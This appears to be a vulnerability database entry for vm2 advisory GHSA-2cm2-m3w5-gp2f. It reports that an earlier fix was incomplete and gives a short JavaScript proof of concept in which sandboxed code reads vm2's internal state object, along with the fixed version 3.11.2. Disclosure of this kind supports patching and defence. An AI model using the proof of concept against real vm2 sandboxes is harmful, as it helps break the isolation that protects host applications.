MEDIUM 5.3

GHSA-2cm2-m3w5-gp2f

vm2 has access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`

상세

### Summary

https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is not fully patched.

### Details

It is still possible to get access to `VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL`.

### PoC

```js const {VM} = require("vm2"); const vm = new VM(); console.log(vm.run(` globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL'] `)); ```

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / vm2

최초 영향 버전: 0 수정 버전: 3.11.2

수정 npm install vm2@3.11.2

참고

https://github.com/patriksimek/vm2/security/advisories/GHSA-2cm2-m3w5-gp2f [WEB]
https://github.com/patriksimek/vm2 [PACKAGE]
https://github.com/patriksimek/vm2/releases/tag/v3.11.2 [WEB]